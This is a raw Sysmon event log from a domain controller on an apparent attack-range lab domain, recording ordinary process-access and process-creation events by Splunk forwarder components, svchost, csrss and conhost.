AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0F-5F80-6300-000000007F01}3844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002200Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002199Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002198Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002197Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002196Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002195Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002194Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002193Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002192Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002191Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3DF7-5F80-0500-000000007F01}644792C:\Windows\system32\csrss.exe{733EE690-3E0F-5F80-6300-000000007F01}3844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002190Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.026{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0F-5F80-6300-000000007F01}3844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002189Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:15.028{733EE690-3E0F-5F80-6300-000000007F01}3844C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\admon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002254Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.510{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E10-5F80-6700-000000007F01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002253Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E10-5F80-6700-000000007F01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002252Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002251Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002250Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E10-5F80-6700-000000007F01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3E09-5F80-3400-000000007F01}20324072C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E10-5F80-6700-000000007F01}3988C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:16.494{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 